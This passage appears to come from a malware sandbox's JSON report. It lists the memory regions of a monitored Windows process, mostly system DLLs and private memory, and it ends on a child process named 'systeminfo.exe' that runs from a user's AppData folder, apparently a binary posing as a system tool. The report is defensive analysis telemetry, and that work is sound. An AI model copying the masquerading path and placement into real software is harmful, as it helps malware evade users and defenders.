"c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1994326016, "timestamp": "00:01:49.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1996292096, "type": "region", "version": 1 }, "end_va": 1997864959, "entry_point": 1996292096, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2458", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1996292096, "timestamp": "00:01:49.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2459", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:49.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2460", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:49.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2461", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:49.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2462", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:49.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2463", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:49.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2464", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:49.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2465", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:49.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 6553599, "entry_point": 0, "filename": null, "id": "region_2592", "name": "private_0x00000000005c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6029312, "timestamp": "00:01:52.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1936719872, "type": "region", "version": 1 }, "end_va": 1936752639, "entry_point": 1936719872, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2593", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1936719872, "timestamp": "00:01:52.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1936785408, "type": "region", "version": 1 }, "end_va": 1937162239, "entry_point": 1936785408, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2594", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1936785408, "timestamp": "00:01:52.748", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1937178624, "type": "region", "version": 1 }, "end_va": 1937436671, "entry_point": 1937178624, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2595", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1937178624, "timestamp": "00:01:52.752", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 8454144, "type": "region", "version": 1 }, "end_va": 9502719, "entry_point": 0, "filename": null, "id": "region_2596", "name": "private_0x0000000000810000", "norm_filename": null, "region_type": "private_memory", "start_va": 8454144, "timestamp": "00:01:52.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1962147839, "entry_point": 1961033728, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2597", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:01:52.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1987051520, "type": "region", "version": 1 }, "end_va": 1987338239, "entry_point": 1987051520, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2598", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1987051520, "timestamp": "00:01:52.946", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1992097792, "type": "region", "version": 1 }, "end_va": 1993121791, "entry_point": 0, "filename": null, "id": "region_2599", "name": "private_0x0000000076bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1992097792, "timestamp": "00:01:52.991", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1993146368, "type": "region", "version": 1 }, "end_va": 1994321919, "entry_point": 0, "filename": null, "id": "region_2600", "name": "private_0x0000000076cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1993146368, "timestamp": "00:01:52.991", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2601", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:53.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1404927, "entry_point": 983040, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2602", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:53.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1935933440, "type": "region", "version": 1 }, "end_va": 1936265215, "entry_point": 1935933440, "filename": "\\Windows\\SysWOW64\\winspool.drv", "id": "region_2603", "name": "winspool.drv", "norm_filename": "c:\\windows\\syswow64\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1935933440, "timestamp": "00:01:53.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 1936326656, "type": "region", "version": 1 }, "end_va": 1936531455, "entry_point": 1936326656, "filename": "\\Windows\\SysWOW64\\winmm.dll", "id": "region_2604", "name": "winmm.dll", "norm_filename": "c:\\windows\\syswow64\\winmm.dll", "region_type": "memory_mapped_file", "start_va": 1936326656, "timestamp": "00:01:53.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1936588800, "type": "region", "version": 1 }, "end_va": 1936670719, "entry_point": 1936588800, "filename": "\\Windows\\SysWOW64\\msacm32.dll", "id": "region_2605", "name": "msacm32.dll", "norm_filename": "c:\\windows\\syswow64\\msacm32.dll", "region_type": "memory_mapped_file", "start_va": 1936588800, "timestamp": "00:01:53.409", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1957822464, "type": "region", "version": 1 }, "end_va": 1957871615, "entry_point": 1957822464, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2606", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1957822464, "timestamp": "00:01:53.418", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1957888000, "type": "region", "version": 1 }, "end_va": 1958281215, "entry_point": 1957888000, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2607", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1957888000, "timestamp": "00:01:53.426", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1958281216, "type": "region", "version": 1 }, "end_va": 1958637567, "entry_point": 1958281216, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2608", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1958281216, "timestamp": "00:01:53.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1960378368, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960378368, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2609", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1960378368, "timestamp": "00:01:53.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1962475520, "type": "region", "version": 1 }, "end_va": 1963118591, "entry_point": 1962475520, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2610", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1962475520, "timestamp": "00:01:53.571", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1963130880, "type": "region", "version": 1 }, "end_va": 1963171839, "entry_point": 1963130880, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2611", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1963130880, "timestamp": "00:01:53.577", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1963196416, "type": "region", "version": 1 }, "end_va": 1964244991, "entry_point": 1963196416, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2612", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1963196416, "timestamp": "00:01:53.582", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1964769280, "type": "region", "version": 1 }, "end_va": 1966194687, "entry_point": 1964769280, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2613", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1964769280, "timestamp": "00:01:53.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1979121664, "type": "region", "version": 1 }, "end_va": 1980104703, "entry_point": 1979121664, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2614", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1979121664, "timestamp": "00:01:53.827", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1984167936, "type": "region", "version": 1 }, "end_va": 1984753663, "entry_point": 1984167936, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2615", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1984167936, "timestamp": "00:01:53.836", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1984757760, "type": "region", "version": 1 }, "end_va": 1985347583, "entry_point": 1984757760, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2616", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1984757760, "timestamp": "00:01:53.843", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1991245824, "type": "region", "version": 1 }, "end_va": 1991950335, "entry_point": 1991245824, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2617", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1991245824, "timestamp": "00:01:53.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1991966720, "type": "region", "version": 1 }, "end_va": 1992069119, "entry_point": 1991966720, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2618", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1991966720, "timestamp": "00:01:53.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2619", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:53.894", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2620", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:53.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 5734399, "entry_point": 0, "filename": null, "id": "region_2621", "name": "pagefile_0x00000000003f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4128768, "timestamp": "00:01:55.125", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 6029311, "entry_point": 0, "filename": null, "id": "region_2622", "name": "private_0x00000000005b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5963776, "timestamp": "00:01:55.125", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1964244992, "type": "region", "version": 1 }, "end_va": 1964638207, "entry_point": 1964244992, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2623", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1964244992, "timestamp": "00:01:55.125", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1983315968, "type": "region", "version": 1 }, "end_va": 1984151551, "entry_point": 1983315968, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2624", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1983315968, "timestamp": "00:01:55.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_2625", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:55.156", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_2626", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:55.156", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_2627", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:55.156", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 8130559, "entry_point": 0, "filename": null, "id": "region_2628", "name": "pagefile_0x0000000000640000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6553600, "timestamp": "00:01:55.156", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9502720, "type": "region", "version": 1 }, "end_va": 30474239, "entry_point": 0, "filename": null, "id": "region_2629", "name": "pagefile_0x0000000000910000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9502720, "timestamp": "00:01:55.156", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 30474240, "type": "region", "version": 1 }, "end_va": 33419263, "entry_point": 30474240, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2630", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 30474240, "timestamp": "00:01:55.157", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1934098432, "type": "region", "version": 1 }, "end_va": 1934622719, "entry_point": 1934098432, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_2631", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1934098432, "timestamp": "00:01:55.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1966079, "entry_point": 0, "filename": null, "id": "region_2632", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:01:55.354", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 33423360, "type": "region", "version": 1 }, "end_va": 34336767, "entry_point": 0, "filename": null, "id": "region_2633", "name": "pagefile_0x0000000001fe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33423360, "timestamp": "00:01:55.665", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 73728, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 532479, "entry_point": 0, "filename": null, "id": "region_2634", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:55.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 647167, "entry_point": 0, "filename": null, "id": "region_2635", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:56.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4001792, "start_va": 34340864, "type": "region", "version": 1 }, "end_va": 38342655, "entry_point": 0, "filename": null, "id": "region_2636", "name": "private_0x00000000020c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34340864, "timestamp": "00:01:56.899", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 38404096, "type": "region", "version": 1 }, "end_va": 39452671, "entry_point": 0, "filename": null, "id": "region_2637", "name": "private_0x00000000024a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38404096, "timestamp": "00:02:01.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 57344, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 712703, "entry_point": 0, "filename": null, "id": "region_2638", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:02:01.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_2639", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:02:01.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1966079, "entry_point": 0, "filename": null, "id": "region_2640", "name": "private_0x00000000001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1703936, "timestamp": "00:02:01.707", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe\"", "filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe", "id": "proc_14", "image_name": "systeminfo.exe", "monitor_reason": "child_process", "monitored_id": 14, "origin_monitor_id": 13, "ref_parent_process": { "ref_id": "proc_13", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2645", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:02:03.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2646", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:02:03.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2647", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:02:03.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No 